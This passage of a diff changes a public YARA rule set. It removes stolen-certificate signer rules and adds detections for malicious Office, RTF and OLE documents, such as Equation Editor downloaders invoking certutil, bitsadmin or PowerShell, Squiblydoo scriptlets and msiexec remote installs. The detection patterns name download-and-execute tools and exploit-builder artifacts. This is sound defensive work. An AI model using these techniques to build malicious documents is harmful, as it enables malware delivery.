+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Makke Digital Works" and pe.signatures [ i ] . serial == "00:85:e1:af:2b:e0:f3:80:e5:a5:d1:15:13:dd:f4:5f:c6" )
+		uint32( 0 ) == 0x74725c7b and ( 1 of ( $ex* ) and 1 of ( $ole* ) and 2 of ( $obj* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02Aa497D39320Fc979Ad96160D90D410 : FILE
+rule DITEKSHEN_INDICATOR_OLE_Metadatacmd : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OLE documents with Windows command-line utilities commands (certutil, powershell, etc.) stored in the metadata (author, last modified by, etc.)."
 		author = "ditekSHen"
-		id = "9387010e-94f5-5787-b30f-609d98c48ddf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "63b23630-b344-5fba-95f4-950d072beaff"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2287-L2298"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L330-L349"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "762b1730c8cfcf5a89e49858723d5701c1fb958eb2cd4da5b240f21763cdabf8"
+		logic_hash = "0562d026a1ad4510310ebff5da154064f92afc7bf714973f7de362435476772c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "33e8e72a75d6f424c5a10d2b771254c07a7d9c138e5fea703117fe60951427ae"
-		importance = 20
+
+	strings:
+		$cmd1 = { 00 1E 00 00 00 [1-4] 00 00 (63|43) (6D|4D) (64|44) (00|20) }
+		$cmd2 = { 00 1E 00 00 00 [1-4] 00 00 (6D|4D) (73|53) (68|48) (74|54) (61|41) (00|20) }
+		$cmd3 = { 00 1E 00 00 00 [1-4] 00 00 (77|57) (73|53) (63|43) (72|52) (69|49) (70|50) (74|54) (00|20) }
+		$cmd4 = { 00 1E 00 00 00 [1-4] 00 00 (63|42) (65|45) (72|52) (74|54) (75|55) (74|54) (69|49) (6C|4C) (00|20) }
+		$cmd5 = { 00 1E 00 00 00 [1-4] 00 00 (70|50) (6F|4F) (77|57) (65|45) (72|52) (73|43) (68|48) (65|45) (6C|4C) (6C|4C) (00|20) }
+		$cmd6 = { 00 1E 00 00 00 [1-4] 00 00 (6E|4E) (65|45) (74|54) 2E (77|57) (65|45) (62|42) (63|43) (6C|4C) (69|49) (65|45) (6E|4E) (74|54) (00|20) }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCHLESS GIFTS, INC." and pe.signatures [ i ] . serial == "02:aa:49:7d:39:32:0f:c9:79:ad:96:16:0d:90:d4:10" )
+		uint16( 0 ) == 0xcfd0 and any of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_D0B094274C761F367A8Eaea08E1D9C8F : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Bitsadmin_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and BITSAdmin. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "3683b66b-3dc0-5b89-be71-1e1267ef7de8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e96a6f18-9a5e-58ca-829e-c82b444ad403"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2300-L2311"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L428-L451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ce9be0bdd8350dd5a8ae8cf2447d1be6b34ee3abc5c19754c63ef03b7cccec9"
+		logic_hash = "39a07a0af243e929a6b3df48b6cf8a9d30bc8ef9e7deac494348945427b015e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e94a9d81c4a67ef953fdb27aad6ec8fa347e6903b140d21468066bdca8925bc5"
-		importance = 20
+		snort2_sid = "910002-910003"
+		snort3_sid = "910001"
+		clamav_sig = "INDICATOR.RTF.EquationBITSAdminDownloader"
+
+	strings:
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$ba = "6269747361646d696e" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nsasoft US LLC" and pe.signatures [ i ] . serial == "d0:b0:94:27:4c:76:1f:36:7a:8e:ae:a0:8e:1d:9c:8f" )
+		uint32( 0 ) == 0x74725c7b and ( ( $eq and $ba ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D59A05955A4A421500F9561Ce983Aac4 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Certutil_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and CertUtil. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "97c4e8fa-8d66-500f-a63f-fac84ad9e508"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a47f31f9-91fc-5009-8aff-2b9e334c3139"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2313-L2324"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L453-L476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9187dcdbf29e5119d90ede266a14c7e46f5050800a38c57fa86e957c885c1d60"
+		logic_hash = "d6c62957ce40ed755a84bd9aa8900e4990c466097d6df55c539b289bf50fe94e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7f56555ac8479d4e130a89e787b7ff2f47005cc02776cf7a30a58611748c4c2e"
-		importance = 20
+		snort2_sid = "910006-910007"
+		snort3_sid = "910003"
+		clamav_sig = "INDICATOR.RTF.EquationCertUtilDownloader"
+
+	strings:
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$cu = "636572747574696c" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" )
+		uint32( 0 ) == 0x74725c7b and ( ( $eq and $cu ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_35590Ebe4A02Dc23317D8Ce47A947A9B : FILE
+rule DITEKSHEN_INDICATOR_RTF_Equation_Powershell_Downloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RTF documents that references both Microsoft Equation Editor and PowerShell. Common exploit + dropper behavior."
 		author = "ditekSHen"
-		id = "36630916-26df-5d2c-8faf-9fa2e240bff3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5d1d65ef-e183-5a0d-a0fa-d0d5f09f21a1"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2326-L2337"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L478-L501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c01f9ecb1e69f6d0cb8061930cda27469eb18be19c0471192b31d516cddf828f"
+		logic_hash = "0b8b9b7b40f8b4d659de9e025a65d5c6b64c6066bb618a3e7ed3c318f70befe5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d9b60a67cf3c8964be1e691d22b97932d40437bfead97a84c1350a2c57914f28"
-		importance = 20
+		snort2_sid = "910004-910005"
+		snort3_sid = "910002"
+		clamav_sig = "INDICATOR.RTF.EquationPowerShellDownloader"
+
+	strings:
+		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
+		$ps = "706f7765727368656c6c" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" )
+		uint32( 0 ) == 0x74725c7b and ( ( $ps and $eq ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1F23F001458716D435Cca1A55D660Ec5 : FILE
+rule DITEKSHEN_INDICATOR_RTF_LNK_Shell_Explorer_Execution : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects RTF files with Shell.Explorer.1 OLE objects with embedded LNK files referencing an executable."
 		author = "ditekSHen"
-		id = "16a904e4-bf1a-5530-9269-d92c0f1bb4d3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2cac4dd8-086a-5220-a658-94cedd9cf7c3"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2339-L2350"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L503-L517"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3e91429f7b25ad54103ee230a36d4b51060adb458b533b9cbd00178a02676629"
+		logic_hash = "4c11a37425e260692e11dc8fca317611106245d1590081a7038036ad568702f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "934d9357b6fb96f7fb8c461dd86824b3eed5f44a65c10383fe0be742c8c9b60e"
-		importance = 20
+
+	strings:
+		$clsid = "c32ab2eac130cf11a7eb0000c05bae0b" ascii nocase
+		$lnk_header = "4c00000001140200" ascii nocase
+		$http_url = "6800740074007000" ascii nocase
+		$file_url = "660069006c0065003a" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" )
+		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and $clsid and $lnk_header and ( $http_url or $file_url )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C2Fc83D458E653837Fcfc132C9B03062 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Forms_HTML_Execution : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects RTF files with Forms.HTML:Image.1 or Forms.HTML:Submitbutton.1 OLE objects referencing file or HTTP URLs."
 		author = "ditekSHen"
-		id = "fbc9420d-4670-502f-af6a-13d17fb73938"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "26b21c94-9192-53be-808b-b553f87769e1"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2352-L2363"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L519-L533"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "96ed5e78195f12cdc0316ed454ad4e2235253ed897905c4a97756b306933d874"
+		logic_hash = "5e8a2072971c40d6fbc0e0265a9adfbe4faa04d0f3c6962fda443da33aa06906"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "82294a7efa5208eb2344db420b9aeff317337a073c1a6b41b39dda549a94557e"
-		importance = 20
+
+	strings:
+		$img_clsid = "12d11255c65ccf118d6700aa00bdce1d" ascii nocase
+		$sub_clsid = "10d11255c65ccf118d6700aa00bdce1d" ascii nocase
+		$http_url = "6800740074007000" ascii nocase
+		$file_url = "660069006c0065003a" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" )
+		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and ( $img_clsid or $sub_clsid ) and ( $http_url or $file_url )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fcb3D3519E66E5B6D90B8B595F558E81 : FILE
+rule DITEKSHEN_INDICATOR_PUB_MSIEXEC_Remote : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects VB-enable Microsoft Publisher files utilizing Microsoft Installer to retrieve remote files and execute them"
 		author = "ditekSHen"
-		id = "966650b5-d776-5ed0-a99b-507b46abd882"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "518db2bb-174b-54c4-b330-1e8a8e36265d"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2365-L2376"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L535-L549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62c7189cc906b9f2d2724492489218d9aecf08ef431463ebf1963b034222f2ad"
+		logic_hash = "be5407e6e6e21e77f6de1d3a378996bfc6ce4326986aa03eb152e772bb495184"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8bf6e51dfe209a2ca87da4c6b61d1e9a92e336e1a83372d7a568132af3ad0196"
-		importance = 20
+
+	strings:
+		$s1 = "Microsoft Publisher" ascii
+		$s2 = "msiexec.exe" ascii
+		$s3 = "Document_Open" ascii
+		$s4 = "/norestart" ascii
+		$s5 = "/i http" ascii
+		$s6 = "Wscript.Shell" fullword ascii
+		$s7 = "\\VBE6.DLL#" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pegasun" and pe.signatures [ i ] . serial == "fc:b3:d3:51:9e:66:e5:b6:d9:0b:8b:59:5f:55:8e:81" )
+		uint16( 0 ) == 0xcfd0 and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4B03Cabe6A0481F17A2Dbeb9Aefad425 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Ancalog_Exploit_Builder_Document : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects documents generated by Phantom Crypter/Ancalog"
 		author = "ditekSHen"
-		id = "3995296a-58ce-5615-8524-525698af3537"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "01e7f949-8ced-5355-978c-34d6e639e61a"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2378-L2389"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L551-L563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3c0d68a65bc53b83a48310857605afda0004b4122201c18a66fea085a210924"
+		logic_hash = "e458be78ca8975d067110dc38119437b3ffe55afdbfdab47468c9ed74bba9f9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2e86cb95aa7e4c1f396e236b41bb184787274bb286909b60790b98f713b58777"
-		importance = 20
+		snort2_sid = "910000-910001"
+		snort3_sid = "910000"
+		clamav_sig = "INDICATOR.RTF.AncalogExploitBuilderDocument"
+
+	strings:
+		$builder1 = "{\\*\\ancalog" ascii
+		$builder2 = "\\ancalog" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" )
+		uint32( 0 ) == 0x74725c7b and 1 of ( $builder* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_539015999E304A5952985A994F9C3A53 : FILE
+rule DITEKSHEN_INDICATOR_RTF_Threadkit_Exploit_Builder_Document : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects vaiations of RTF documents generated by ThreadKit builder."
 		author = "ditekSHen"
-		id = "b53f5843-fb4c-5c61-be24-21bdbc445239"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f4a4e7f0-ea2f-523f-9634-a939dc90706e"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2391-L2402"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L565-L582"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "72304761de1d5e81659487947a1cfa017f7f41d5639f18634db4dfd094980518"
+		logic_hash = "f2308ac6ae5345e0c783871dd6b471397ec83ba7194db5cc74c8984d84c2c0c2"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "7731825aea38cfc77ba039a74417dd211abef2e16094072d8c2384af1093f575"
-		importance = 20
+
+	strings:
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$obj7 = "\\mmath" ascii
+		$pat1 = /\\objupdate\\v[\\\s\n\r]/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" )
+		uint32( 0 ) == 0x74725c7b and 2 of ( $obj* ) and 1 of ( $pat* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_016836311Fc39Fbb8E6F308Bb03Cc2B3 : FILE
+rule DITEKSHEN_INDICATOR_XML_Legacydrawing_Autoload_Document : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects AutoLoad documents using LegacyDrawing"
 		author = "ditekSHen"
-		id = "06cc9c38-c5a6-5311-8ceb-943ea3993fc7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ce116601-7048-5a3f-9b73-5127ca3b359e"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2404-L2415"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L584-L594"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "912d490ac5d746c584e4dd5639be98d9577faba215cc1f8ebdf360581be53d5c"
+		logic_hash = "a038636f5e8e7837c2209072f1659b921c8a9a48d4ed153e735915cf1f7f3fcc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cab373e2d4672beacf4ca9c9baf75a2182a106cca5ea32f2fc2295848771a979"
-		importance = 20
+
+	strings:
+		$s1 = "<legacyDrawing r:id=\"" ascii
+		$s2 = "<oleObject progId=\"" ascii
+		$s3 = "autoLoad=\"true\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" )
+		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : FILE
+rule DITEKSHEN_INDICATOR_XML_OLE_Autoload_Document : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects AutoLoad documents using OLE Object"
 		author = "ditekSHen"
-		id = "deedbc3a-8c77-5c2c-b3c1-40e5d082ec5a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b3d682c3-641a-554a-8607-e99d07e9a57d"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2417-L2428"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L596-L606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "85efd10f6c49b93215c9f8f97915c62fb3ed3bb158b2137e953022b550263726"
+		logic_hash = "b262a9f8e82dea55afc26acac731827b64f52069a2bf314f716832b3dfc2c04f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "885b9f1306850a87598e5230fcae71282042b74e8a14cabb0a904c559b506acb"
-		importance = 20
+
+	strings:
+		$s1 = "autoLoad=\"true\"" ascii
+		$s2 = "/relationships/oleObject\"" ascii
+		$s3 = "Target=\"../embeddings/oleObject" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES" and pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" )
+		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_082023879112289Bf351D297Cc8Efcfc : FILE
+rule DITEKSHEN_INDICATOR_XML_Squiblydoo_1 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects Squiblydoo variants extracted from exploit RTF documents."
 		author = "ditekSHen"
-		id = "292f99be-2eb0-5ad1-bd07-766de7822f1e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cac326ab-cc31-59c1-bd12-285db1675695"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2430-L2441"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L608-L622"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0747b37139daaba10a17098aeb0c6246290fbd997345de34ce9de8da26d7db05"
+		logic_hash = "b52ebd76dd4e60f6bd5cb19fed3a72b6aeb90dea95f0d1be61dcfff39ea674ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0eb3382177f26e122e44ddd74df262a45ebe8261029bc21b411958a07b06278a"
-		importance = 20
+
+	strings:
+		$slt = "<scriptlet" ascii
+		$ws1 = "CreateObject(\"WScript\" & \".Shell\")" ascii
+		$ws2 = "CreateObject(\"WScript.Shell\")" ascii
+		$ws3 = "ActivexObject(\"WScript.Shell\")" ascii
+		$r1 = "[\"run\"]" nocase ascii
+		$r2 = ".run \"cmd" nocase ascii
+		$r3 = ".run chr(" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" )
+		( uint32( 0 ) == 0x4d583f3c or uint32( 0 ) == 0x6d783f3c ) and $slt and 1 of ( $ws* ) and 1 of ( $r* )
 }
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_Reverse : FILE
+{
+	meta:
+		description = "detects OLE documents containing VB scripts with reversed suspicious strings"
+		author = "ditekSHen"
+		id = "a7f4d18d-add6-5df2-9a8c-f88d8e3766da"
+		date = "2024-09-06"
+		modified = "2024-09-06"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L624-L644"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "04950549eede23b7006103539f20437713a54138c073d9805048392ea0a3df2a"
+		score = 65
+		quality = 71
+		tags = "FILE"
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ece6Cbf67Dc41635A5E5D075F286Af23 : FILE
+	strings:
+		$vb = "\\VBE7.DLL" ascii
+		$cmd1 = "CMD C:\\" nocase ascii
+		$cmd2 = "CMD /c " nocase ascii
+		$kw1 = "]rAHC[" nocase ascii
+		$kw2 = "ekOVNI" nocase ascii
+		$kw3 = "EcaLPEr" nocase ascii
+		$kw4 = "TcEJBO-WEn" nocase ascii
+		$kw5 = "eLbAirav-Teg" nocase ascii
+		$kw6 = "ReveRSE(" nocase ascii
+		$kw7 = "-JOIn" nocase ascii
+
+	condition:
+		uint16( 0 ) == 0xcfd0 and $vb and ( ( 1 of ( $cmd* ) and 1 of ( $kw* ) ) or ( 2 of ( $kw* ) ) )
+}
+rule DITEKSHEN_INDICATOR_OLE_Suspicious_Activex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "detects OLE documents with suspicious ActiveX content"
 		author = "ditekSHen"
-		id = "53312007-179d-547c-8195-0b5d78181300"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e4a74955-8519-561d-bb23-6469e7ae5aaa"
+		date = "2024-09-06"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2443-L2454"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L646-L676"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
